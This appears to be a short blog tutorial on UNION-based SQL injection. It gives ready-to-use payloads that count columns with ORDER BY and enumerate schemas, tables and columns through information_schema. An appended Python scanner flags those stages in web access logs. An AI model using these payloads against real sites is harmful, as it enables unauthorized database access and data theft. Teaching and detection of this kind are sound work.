Showing posts from September 2023

SQL injection with UNION

First, identify the number of columns using an ORDER BY clause:

    1 order by 1 --
    1 order by 2 --
    . . .

When an error is shown, you have reached the number of columns in the SELECT statement: the last index that did not produce an error is the column count.

Then find out the schema name:

    1 union select schema_name,null,null,null from information_schema.schemata --

Next, find the table name:

    1 UNION SELECT table_name,TABLE_ROWS,TABLE_SCHEMA,null FROM information_schema.tables --

... and the column names:

    1 UNION select column_name,table_name, table_schema,null from information_schema.columns --
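The sequence above leaves a recognisable trail in web access logs, and the following added example (not code from the original post) shows one way to flag it per client. The log line format `<client> <url>`, the `/item` endpoint, the label names and the `SWEEP_MIN` threshold are all assumptions made for the illustration.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qsl

# Stage patterns, matched against URL-decoded query parameter values.
ORDER_BY = re.compile(r"\border\s+by\s+(\d+)\s*(?:--|#|$)", re.I)
UNION_SELECT = re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)
INFO_SCHEMA = re.compile(r"\binformation_schema\s*\.\s*(schemata|tables|columns)\b", re.I)
SWEEP_MIN = 3  # assumed threshold: distinct ORDER BY indexes that count as a sweep

def classify(value):
    """Return the stage labels present in one decoded parameter value."""
    labels = set()
    if ORDER_BY.search(value):
        labels.add("order-by-probe")
    if UNION_SELECT.search(value):
        labels.add("union-select")
    match = INFO_SCHEMA.search(value)
    if match:
        labels.add("enum-" + match.group(1).lower())
    return labels

def scan(log_lines):
    """Map client address -> sorted stage labels; each line is '<client> <url>'."""
    stages, indexes = defaultdict(set), defaultdict(set)
    for line in log_lines:
        client, url = line.split(None, 1)
        for _, value in parse_qsl(urlsplit(url.strip()).query):
            stages[client] |= classify(value)
            probe = ORDER_BY.search(value)
            if probe:
                indexes[client].add(int(probe.group(1)))
    report = {}
    for client, labels in stages.items():
        if len(indexes[client]) >= SWEEP_MIN:
            labels.add("column-count-sweep")  # incrementing ORDER BY = column counting
        if labels:
            report[client] = sorted(labels)
    return report

# Constructed sample log lines (documentation addresses, hypothetical /item endpoint).
SAMPLE = [
    "203.0.113.7 /item?id=1+order+by+1+--",
    "203.0.113.7 /item?id=1%20ORDER%20BY%202%20--",
    "203.0.113.7 /item?id=1+order+by+5+--+",
    "203.0.113.7 /item?id=1+union+select+schema_name,null,null,null+from+information_schema.schemata+--",
    "203.0.113.7 /item?id=1+UNION+SELECT+table_name,TABLE_ROWS,TABLE_SCHEMA,null+FROM+information_schema.tables+--",
    "198.51.100.4 /item?id=42&sort=price",
]

if __name__ == "__main__":
    for client, labels in scan(SAMPLE).items():
        print(client, labels)
```

Matching on decoded values catches both `+` and `%20` encodings; a rule like this complements, and does not replace, parameterized queries in the application.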